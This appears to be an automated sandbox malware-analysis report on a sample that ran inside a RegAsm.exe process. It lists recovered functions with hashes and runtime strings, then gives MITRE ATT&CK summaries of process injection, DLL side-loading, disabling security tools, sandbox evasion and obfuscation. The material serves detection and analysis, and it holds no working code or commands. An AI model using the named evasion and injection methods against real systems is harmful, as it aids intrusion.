Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86192f4b44524891cc3bd44608aa5e6c16c627acfd43343e0e1fc62d53a804e
Instruction ID: b6ab864ef804c55cdcf88bfcc16f2abe7f971b35f9aea1798e30477be6a35adb
Opcode Fuzzy Hash: d86192f4b44524891cc3bd44608aa5e6c16c627acfd43343e0e1fc62d53a804e
Instruction Fuzzy Hash: 5390027524181402D10071584808747001587D0702F55C111A61A4555E8665C9926531

Function 02CC2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0014d32fef76bf898cc294e627d79bdc10eccfef69ed79afacdacb169dea6f21
Instruction ID: 412296b368889884f7bf34d7387e42e285b855da344f17b40a65c8b8788e46ca
Opcode Fuzzy Hash: 0014d32fef76bf898cc294e627d79bdc10eccfef69ed79afacdacb169dea6f21
Instruction Fuzzy Hash: 7C900265641410424140716888449074015ABE1611755C221A19D8550D855989665665

Function 02CC2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d25162ec47f01b5b6748ba2f7e780dcc49dba008590a0b10cabec628b4d42d9
Instruction ID: 5e850568b4042cfcb5f5b09809dc7b6ed1b8f6f436b1b43fb4bde2d6cbd2b29e
Opcode Fuzzy Hash: 1d25162ec47f01b5b6748ba2f7e780dcc49dba008590a0b10cabec628b4d42d9
Instruction Fuzzy Hash: B99004F535141043D104715C44047070055C7F1701F55C113F31D4554CC53DCD735135

Function 02CC2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 266feb07be326449ec1a515951944fb645476a67f202d6620de3597dc2faf015
Instruction ID: 1314aca47ede0f30798eb5392207a155fba84ac9b772e22bf7ba31676876a235
Opcode Fuzzy Hash: 266feb07be326449ec1a515951944fb645476a67f202d6620de3597dc2faf015
Instruction Fuzzy Hash: 9F9002A538141442D10071584414B070015C7E1701F55C115E20A4554D8619CD536126

Function 02CC2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 016001353a2615aeda77c3db6530135225768bd07ed6922c546a79eb5690f14a
Instruction ID: 9b61efa1909dd930da796e579d0a35dc1b955310b5b49e0dfd2483e599e78e3b
Opcode Fuzzy Hash: 016001353a2615aeda77c3db6530135225768bd07ed6922c546a79eb5690f14a
Instruction Fuzzy Hash: 1590047574541403D140715C541C7070035C7D0701F55D111F1074554DC75DCF5777F1

Function 02CC2CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8017d3199b2617bed60ea7d8b9072d4d829627ab85807e228716ee4a1a454ae
Instruction ID: 8a5ceb42a2506d7d0a3c43cca729a8be77839fdc608dc8a8178da3ac2b071508
Opcode Fuzzy Hash: b8017d3199b2617bed60ea7d8b9072d4d829627ab85807e228716ee4a1a454ae
Instruction Fuzzy Hash: 4090047534141403D100715C550C7070015C7D0701F55D511F147455CDD757CD537131

Function 02CC2CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb23f13965d8237d0506d7ab6eefce9acfc9406b0a364ee46e64935436a1ba5f
Instruction ID: 647ce67dc3cae6b856c826e2d996369086f098567887ac6410113e45c9dc011d
Opcode Fuzzy Hash: fb23f13965d8237d0506d7ab6eefce9acfc9406b0a364ee46e64935436a1ba5f
Instruction Fuzzy Hash: E190027524141402D10075985408647001587E0701F55D111A6064555EC66589926131

Function 02CC2C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bd9ed31164f7336e391a445a247facaacce21473985f034141f29224a4e063e
Instruction ID: 6fd833d25855e2d7e22d718414d44983115e3fa5ae00c58648ee4db7835a1b64
Opcode Fuzzy Hash: 2bd9ed31164f7336e391a445a247facaacce21473985f034141f29224a4e063e
Instruction Fuzzy Hash: 3190047534141C43D100715C4404F470015C7F0701F55C117F1174754DC715CD537531

Function 02CC2DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aade7e432ce9e635068d20ae030fbf2c0a4f874d85900fd18d0c8850085352e
Instruction ID: 6d917cd11db48eef6e218658d32ad8f6f72927949c216db775f49900378366a3
Opcode Fuzzy Hash: 5aade7e432ce9e635068d20ae030fbf2c0a4f874d85900fd18d0c8850085352e
Instruction Fuzzy Hash: 15900265282451525545B1584404507401697E0641795C112A2454950C85269957D621

Function 02CC2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f3def97605a643c4b1c950df0ce2c31d8e61d596b57cb38b90df7e55eeb3b00
Instruction ID: f6003c531e55d0c1f2af5a8115953414af93b9be66998cd3087dcbde10a710d4
Opcode Fuzzy Hash: 6f3def97605a643c4b1c950df0ce2c31d8e61d596b57cb38b90df7e55eeb3b00
Instruction Fuzzy Hash: 4D90027528141402D14171584404607001997D0641F95C112A1464554E86558B57AA61

Function 02CC3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a35c0edc387392610ac8f5bbb0faa9943ec541ca5a97bba7a0397866b9cef732
Instruction ID: c06f9ca30eaa4d4a92e1d4f4f09bf9ec7fa107a11706e2db26050d430005c2dc
Opcode Fuzzy Hash: a35c0edc387392610ac8f5bbb0faa9943ec541ca5a97bba7a0397866b9cef732
Instruction Fuzzy Hash: AC90027924141402D51071585804647005687D0701F55D511A1464558D865489A2A121

Function 02CC2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c97b74b5436a4c1393da4e83642665b2201862b02fbfa931abcbbf33c11d9bc
Instruction ID: 7e1011d4bd348bf03347c7a95601c9c8623b932b89aefdadd7d9e8a7cfb3bb50
Opcode Fuzzy Hash: 2c97b74b5436a4c1393da4e83642665b2201862b02fbfa931abcbbf33c11d9bc
Instruction Fuzzy Hash: 7490026524545442D10075585408A07001587D0605F55D111A20A4595DC6358952A131

Function 02CC3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76927f0ea02758a6bac6bdfe6760e8476695a1cd59d2e02fe5a5eaa53d4416c1
Instruction ID: ff3f840ed3417d86457f71fd0d69e22e9e2e42eb7caf9918e5b6cfd2b82222fc
Opcode Fuzzy Hash: 76927f0ea02758a6bac6bdfe6760e8476695a1cd59d2e02fe5a5eaa53d4416c1
Instruction Fuzzy Hash: B790027524241142954072585804A4F411587E1702B95D515A1055554CC91489625221

Function 02CC2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b013ea594d41795b486829e558840df26970727e491d91bd2956a1a480da5e62
Instruction ID: da3887e63477a69b21fe92a2fab0986b185834930658d5a15bccb087db9d3883
Opcode Fuzzy Hash: b013ea594d41795b486829e558840df26970727e491d91bd2956a1a480da5e62
Instruction Fuzzy Hash: A090026D25341002D1807158540860B001587D1602F95D515A1055558CC915896A5321

Function 02CC2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad4dc4e58ae70024a2bbb85d5e4efd0c9a9c9460d5bbb82d94afd13aa4efb624
Instruction ID: a868844957b02ace08aaf316517571dcfe632bdeadc4450833b2eeb046e6a163
Opcode Fuzzy Hash: ad4dc4e58ae70024a2bbb85d5e4efd0c9a9c9460d5bbb82d94afd13aa4efb624
Instruction Fuzzy Hash: C790047534141003D140715C541C7074015D7F1701F55D111F1454554CDD15CD575333

Function 02CC2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: ba0b3ea286ff15e4b8212021e1845fc78709407bb6360900cf2e1373e8effbe4
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 02CC2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02CC293C
___swprintf_l.LIBCMT ref: 02CC295E
___swprintf_l.LIBCMT ref: 02CC29A3
___swprintf_l.LIBCMT ref: 02CFA52E

Strings

:%u.%u.%u.%u, xrefs: 02CFA5B8
ffff:, xrefs: 02CFA504
::ffff:0:%u.%u.%u.%u, xrefs: 02CFA54E
::%hs%u.%u.%u.%u, xrefs: 02CFA527

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: f18faa4e779c440cba9236100e5bcaff5ef03e3f81d235faf7da36df8dc27507
Instruction ID: eddbc62a8b2fec371252487dd42c8d5e59fe93b45c58e00fede725544a5ae2a5
Opcode Fuzzy Hash: f18faa4e779c440cba9236100e5bcaff5ef03e3f81d235faf7da36df8dc27507
Instruction Fuzzy Hash: 025108B6A04156BFDB54DBA8888097EF7B8BF48300B60816DE959D7641D374DF40CBE1

Function 02CB7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 02CF4787
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02CF4655
Execute=1, xrefs: 02CF4713
ExecuteOptions, xrefs: 02CF46A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02CF4725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02CF4742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02CF46FC

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 30d1652a6d5031764abd2dd89075822efc14a8ae9075ae0c49b17492ecdd8fc1
Instruction ID: 6d7e907a11778af26cf024a6274ffb2d4109f41613d9c0ddb13a5113b358c5ed
Opcode Fuzzy Hash: 30d1652a6d5031764abd2dd89075822efc14a8ae9075ae0c49b17492ecdd8fc1
Instruction Fuzzy Hash: 6B510C326402197AEF269B75DC89FFAB3B9EF84304F1400A9D905A7290EB719E49DF50

Function 02CCB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02CCB6BF

Strings

+, xrefs: 02CCB65A
-, xrefs: 02CCB650
0, xrefs: 02CCB695
0, xrefs: 02CCB66F

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: ff6405e01cde3c6a6669b2c3c6f50e074b01eab2aebfeef497e661d871bca08f
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 75819170E452499ADF289EE8C4527FEBBB2AF85318F38415DD851A7290C7349E40CB60

Function 02CAF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02CF02E7
RTL: Re-Waiting, xrefs: 02CF031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02CF02BD

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: dbe57f82a1a9033fef2ab38439995b892c1014c4fdf4360bd0168a0acf1cf2aa
Instruction ID: 091618065bc5a5ce27fa96f0475920143b81114215f9e76394d6eb67c38651ef
Opcode Fuzzy Hash: dbe57f82a1a9033fef2ab38439995b892c1014c4fdf4360bd0168a0acf1cf2aa
Instruction Fuzzy Hash: C9E10E306087429FD764CF28C894B2AB7E1BF88718F204A2DF5A5CB6E1D775DA44CB52

Function 02CBBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 02CF7BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02CF7B7F
RTL: Resource at %p, xrefs: 02CF7B8E

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: d4f119ce63b3005eb104e0678d8326b519699f1a9bcd2cb452f9423d76b52428
Instruction ID: 6bf2c8edb7ba347a2bd1f25bad6a2f60c093db64f6ab101a064abd57fe059d7d
Opcode Fuzzy Hash: d4f119ce63b3005eb104e0678d8326b519699f1a9bcd2cb452f9423d76b52428
Instruction Fuzzy Hash: 0841E0353047429FDB21CF25C844BAAB7E6EF89714F100A2DE95ADB680DB71E905CF91

Function 02CBB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02CF728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02CF7294
RTL: Re-Waiting, xrefs: 02CF72C1
RTL: Resource at %p, xrefs: 02CF72A3

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: f2f94d8eb8133eb97d35e7f3c4fb905176919076e9aa2d8fcc1a60d013b46427
Instruction ID: 66b792e425197e1c4c3441a6e71ba58be237939e7baf250a1ae3bdedaa90506f
Opcode Fuzzy Hash: f2f94d8eb8133eb97d35e7f3c4fb905176919076e9aa2d8fcc1a60d013b46427
Instruction Fuzzy Hash: CC41EF31604202AFD761CF25CC81BAAB7A5FF94714F204619FE55EB280DB20ED5ACBE1

Function 02CC7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02CC7E8B

Strings

-, xrefs: 02CC7DDD
+, xrefs: 02CC7DE8

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: c30a30b5ab061f3a9125bf5c088d95d61727c594460f9932416c2d6f1a961d50
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 3E9180B1E0021A9FDB24DE69C8816BEF7A9EF84724F34461EE855EB2C0D7319A45CF50

Function 02C89126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 02C89191
@, xrefs: 02C89175

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 64bf64fd1539a214fff6ba3f8a1a82ab56b74d52af53b46fc80ae6afdf1975f6
Instruction ID: 20cb7adc80933d8fb504e97ce62f7baf1a29f3bc9b91ae150c510c138f6bc5e8
Opcode Fuzzy Hash: 64bf64fd1539a214fff6ba3f8a1a82ab56b74d52af53b46fc80ae6afdf1975f6
Instruction Fuzzy Hash: AA813CB1D002699BDF31DB54CC44BEEB7B8AB48714F0041DAEA0AB7240E7309E85DFA1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

